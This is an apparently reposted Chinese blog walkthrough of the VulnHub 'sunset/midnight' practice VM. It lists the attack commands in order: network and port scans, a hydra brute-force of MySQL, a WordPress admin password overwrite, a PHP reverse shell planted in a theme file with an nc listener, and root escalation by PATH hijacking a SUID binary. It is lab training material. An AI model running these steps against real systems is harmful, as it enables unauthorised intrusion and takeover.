vulnhub之sunset/midnight的实践
2023-3-5 18:38:39 Author: 云计算和网络安全技术实践(查看原文) 阅读量:16 收藏

今天实践的是vulnhub的sunset/midnight镜像,

下载地址,https://download.vulnhub.com/sunset/midnight.7z,

先是用workstation导入,做地址扫描没扫到地址,

于是又用virtualbox导入,重新做地址扫描,

sudo netdiscover -r 192.168.0.0/24,这回有地址了,195就是,

再继续做端口扫描,sudo nmap -sS -sV -T5 -A -p- 192.168.0.195,

有web服务,浏览器访问http://192.168.0.195,转到了域名访问,

把域名和IP添加到hosts文件,再次浏览器访问http://sunset-midnight,

做一下目录暴破,dirb http://sunset-midnight,发现了后台url,

浏览器访问http://sunset-midnight/login,需要用户名密码,

之前端口扫描的时候还看到有mysql服务,可以做个root账户的密码暴破,

hydra -l root -P /usr/share/wordlists/rockyou.txt sunset-midnight mysql -t 4,获取到root/robert,

访问mysql服务,mysql -h sunset-midnight -u root -probert,

查看到了后台管理员的账号密码,密码是md5的,

自己造一个密码,123456,在线转成md5的,

更新后台管理员的密码,update wp_users set user_pass='e10adc3949ba59abbe56e057f20f883e' where id=1;

用admin/123456登录后台管理url,

根据以往经验,找到可以上传反弹shell内容的页面,

把kali攻击机上/usr/share/webshells/php/php-reverse-shell.php的内容贴上,并修改好kali攻击机的地址和端口,保存成功,

kali攻击机这边开个反弹shell监听,nc -lvp 4444,

浏览器访问http://sunset-midnight/wp-content/themes/twentynineteen/404.php,反弹shell这就过来了,不是root权限,需要提权,

转成交互式shell,python3 -c "import pty;pty.spawn('/bin/bash')",

从/var/www/html/wordpress/wp-config.php中查看到用户名密码,

jose/645dc5a8871d2a4269d4cbe23f6ae103,

切到jose,查找root权限执行的程序,find / -perm -u=s 2>/dev/null,

从status程序中搜索service命令,strings /usr/bin/status | grep service,

做个新的环境变量路径,export PATH=/tmp/:$PATH,造个新的service,

cd /tmp,echo "/bin/sh" > service,给可执行权限,chmod +x service,

执行status程序,/usr/bin/status,获取到新的shell,id确认是root,


文章来源: http://mp.weixin.qq.com/s?__biz=MzA3MjM5MDc2Nw==&mid=2650747491&idx=1&sn=02ff5a932432ba69ce1830f2215aca22&chksm=87149363b0631a759b33e53aa607e9d677b5852d820eea62c9aff0617a0771d61a08a10b7c9d#rd
如有侵权请联系:admin#unsafe.sh